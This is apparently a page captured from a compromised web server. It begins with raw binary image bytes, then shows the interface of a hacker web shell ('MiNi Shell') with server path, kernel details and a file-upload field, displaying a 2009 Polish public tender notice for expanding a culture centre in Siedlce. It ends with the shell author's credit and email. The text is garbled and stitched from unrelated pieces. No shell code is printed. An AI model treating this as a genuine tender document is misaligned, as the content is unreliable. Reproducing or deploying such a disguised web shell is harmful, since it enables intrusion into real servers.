JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162209-N-2009.html

<p class="kh_header"><b>Siedlce: Rozbudowa  budynku Centrum Kultury i Sztuki w Siedlcach przy ul. Bpa I. Świrskiego 31 w Siedlcach</b><br>
<b>Numer ogłoszenia: 162209 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kultury i Sztuki w Siedlcach , ul. Bp. I. Świrskiego 31, 08-110 Siedlce, woj. mazowieckie, tel. 025 6446800, faks 025 6445646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ckis.siedlce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa  budynku Centrum Kultury i Sztuki w Siedlcach przy ul. Bpa I. Świrskiego 31 w Siedlcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Rozbudowa budynku Centrum Kultury i Sztuki w Siedlcach przy ul. Bpa I. Świrskiego 31 w Siedlcach.
ZAKRES  ZAMÓWIENIA:

I.Roboty ogólnobudowlane:
1.Roboty rozbiórkowe (na części budynku : dach, ściany murowane, elementy żelbetowe, elementy stalowe, ławy i stopy fundamentowe, posadzki, sufity, elementy wyposażenia)
2.Konstrukcja - Roboty ziemne
3.Konstrukcja - Roboty murowe ( ściany ) 
4.Konstrukcja - Elementy żelbetowe ( ściany, stropy, słupy, belki, podciągi, schody)
5.Konstrukcja - Elementy stalowe ( słupy, belki, schody )
6.Roboty wykończeniowe - elewacja na części budynku obudowana ścianami z  blachy trapezowej oraz na części tynkowanie
7.Pokrycie dachu i izolacja
8.Roboty wykończeniowe - ścianki działowe z płyt g-k
9.Roboty wykończeniowe - ścianki działowe mobilne z płyt laminowanych
10.Roboty wykończeniowe - tynki i okładziny wewnętrzne 
11.Roboty wykończeniowe - malowanie ścian i sufitów
12.Roboty wykończeniowe - podłoża i posadzki
13.Roboty wykończeniowe - sufity podwieszane
14.Roboty wykończeniowe - stolarka  drzwiowa wewnętrzna i zewnętrzna
15.Roboty zewnętrzne i wewnętrzne - izolacje

II.Roboty sanitarne
1.Demontaż instalacji c.o. 
2.Wykonanie instalacji wod-kan 
3.Wykonanie instalacji  p/poż. 
4.Wykonanie instalacji  c.o.
5.Wykonanie instalacji c.t.
6.Wykonanie wentylacji mechanicznej i klimatyzacji 

III.Roboty elektryczne
1.Demontaż instalacji elektrycznej
2.Wykonanie instalacji elektrycznej ( tablice rozdzielcze, instalacje odgromowe i wyrównawcze, oświetleniowe i gniazd wtykowych, dźwiękowy system rozgłoszeniowy, oświetlenie architektoniczne )
       
IV.Wyposażenie sceny
V.Tablice: informacyjna i pamiątkowa
1. Montaż tablic: informacyjnej i pamiątkowej, informujących, iż projekt współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013 (Sugerowany minimalny wymiar tablicy informacyjnej - 140 cm x 200 cm. Sugerowany minimalny wymiar tablicy pamiątkowej - 90 cm x 70 cm.)


DODATKOWE  INFORMACJE  DOTYCZĄCE  PRZEDMIOTU  ZAMÓWIENIA.

1.Wykonawca powinien:
a) prowadzić roboty budowlane zgodnie z warunkami pozwolenia na budowę Nr 318/2009 z   dnia  13.08.2009r.
 b) uzyskać wszelkie zezwolenia zarządcy drogi na zajęcie pasa drogowego w celu prowadzenia   robót, uwzględnić poniesione koszty w ofercie.
c) zwrócić szczególną uwagę na prawidłowe funkcjonowanie i zabezpieczenie obiektu podczas prac     rozbiórkowych i przebudowy
d)zapewnić materiały o parametrach  technicznych porównywalnych  z materiałami opisanymi w specyfikacji technicznej  wykonania i odbioru  robót i dokumentacji projektowej,
e) prowadzić dokumentację budowy/dziennik budowy/
f) wykonać roboty zgodnie z dokumentacją, sztuką budowlaną, specyfikacjami szczegółowymi obowiązującymi przy wykonaniu robót oraz warunkami bezpieczeństwa i ochrony zdrowia,
g) zamontować tablicę informacyjną budowy.
h) uzyskać protokoły prób i badań wymaganych odrębnymi przepisami.
i) zapewnić obsługę geodezyjną w terenie - inwentaryzacja powykonawcza. 
2. Materiały uzyskane z rozbiórki stanowią własność Wykonawcy i jego obowiązkiem jest ich  wywiezienie.
3.Przed przystąpieniem do złożenia oferty wskazana jest wizja w terenie.

Uwaga: Szczegółowy zakres robót przedstawiony jest w dokumentacji projektowej (dokumentacja budowlana, specyfikacje techniczne wykonania i odbioru robót budowlanych) będącej załącznikiem do specyfikacji, natomiast przedmiar robót należy traktować jako załącznik dodatkowy, pomocniczy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.22.32.10-1, 45.45.30.00-7, 45.26.10.00-4, 45.26.25.22-6, 45.32.00.00-6, 45.32.10.00-3, 45.42.10.00-4, 45.44.21.00-8, 45.42.11.46-9, 45.43.20.00-4, 45.23.13.00-8, 45.33.11.00-7, 45.33.10.00-6, 45.34.30.00-3, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości:  90.000,00 zł   (słownie: dziewięćdziesiąt tysięcy zł)
Wadium w formie pieniężnej wykonawca wpłaci przelewem na konto Centrum Kultury i Sztuki w Siedlcach PKO BP S.A. I O/Siedlce Nr 98 10204476 0000 8902 0022 1291, Centrum Kultury i Sztuki w Siedlcach, ul. Bpa I. Świrskiego 31, z dopiskiem Przebudowa budynku Centrum Kultury i Sztuki w Siedlcach przy ul. Bpa I. Świrskiego 31 w Siedlcach
Wniesienie wadium w pieniądzu będzie skuteczne jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
Wadium wnoszone w innej formie jak pieniądze wykonawca składa w oryginale w Dziale Księgowym Centrum Kultury i Sztuki w Siedlcach w godzinach od 8.00 do  15.45. Nie należy załączać oryginału dokumentu wadialnego do oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności.
To jest: 

a)Przedstawią aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie  do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru   lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

b)Przedstawią aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające ze wykonawca nie zalega z opłaceniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert.

c)Przedstawią aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłaceniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu - wystawione nie wcześniej niż   3 miesiące przed upływem terminu składania ofert.

d)Przedstawią aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

e)Przedstawią aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. To jest:

a)Dysponują osobą, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej wraz z przynależnością do Okręgowej Izby Inżynierów Budownictwa.
b)Dysponują osobą, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych wraz z przynależnością do Okręgowej  Izby Inżynierów Budownictwa.
c)Dysponują osobą, która będzie uczestniczyć w wykonaniu zamówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie  instalacji i urządzeń elektrycznych wraz z przynależnością do Okręgowej Izby Inżynierów Budownictwa.

d)Wykonali roboty budowlane w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, daty, miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. W szczególności zamawiający wymaga, aby wykonawca wykonał co najmniej 3 roboty o charakterze i złożoności porównywalnej z przedmiotem zamówienia, w tym jedną  o wartości nie mniejszej niż  3 750 000,00 zł  oraz dwie o wartości nie mniejszej niż 1 500 000,00 zł każda. Do wykazu należy dołączyć dokumenty potwierdzające jakość wykonanych robót. Wykaz robót będzie nieważny bez potwierdzającego dokumentu  należytego wykonania robót np. referencji, protokołu końcowego odbioru robót.

3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

a)Przedstawią informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których posiadają rachunek potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową na kwotę 3 750 000,00 zł wystawioną nie wcześniej niż 3 miesiące przed upływem na składanie ofert.

4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
 
Zamawiający oceni spełnienie warunków udziału w postępowaniu zgodnie z formułą  spełnia/nie spełnia w oparciu o informacje zawarte w wymaganych w SIWZ dokumentach..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny odpis  właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

3.Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i  społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

4.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

5.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

6.Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.  W szczególności zamawiający wymaga, aby wykonawca wykonał co najmniej 3 roboty o charakterze i złożoności porównywalnej z przedmiotem zamówienia, w tym jedną o wartości nie mniejszej niż  3 750 000,00 zł  oraz dwie o wartości nie mniejszej niż 1 500 000,00 zł każda. Do wykazu należy dołączyć dokumenty potwierdzające jakość wykonanych robót. Wykaz robót będzie nieważny bez potwierdzającego dokumentu  należytego wykonania robót np. referencji, protokołu końcowego odbioru robót.

7.Oświadczenie o spełnieniu warunków udziału w postępowaniu - art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 Ustawy .

8.Uprawnienia budowlane osoby, która będzie uczestniczyć w wykonaniu zamówienia do  kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej wraz  z przynależnością do Okręgowej Izby Inżynierów Budownictwa.

9.Uprawnienia budowlane osoby, która będzie uczestniczyć w wykonaniu zamówienia do  kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji  i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych wraz z przynależnością do Okręgowej  Izby Inżynierów Budownictwa.

10.Uprawnienia budowlane osoby, która będzie uczestniczyć w wykonaniu zamówienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji  i urządzeń elektrycznych wraz z przynależnością do Okręgowej Izby Inżynierów Budownictwa.

11.Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę 3 750 000,00 zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Dokumenty, o których mowa w pkt. 8 należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ckis.siedlce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Administracyjno-Gospodarczy CKiS w Siedlcach, 08-110 Siedlce, ul. Bpa I. Świrskiego 31, (cena: 564,86 zł brutto + koszt przesyłki)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 14:00, miejsce: Centrum Kultury i Sztuki w Siedlcach, Sekretariat, ul. Bpa I. Świrskiego 31, 08-110 Siedlce.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com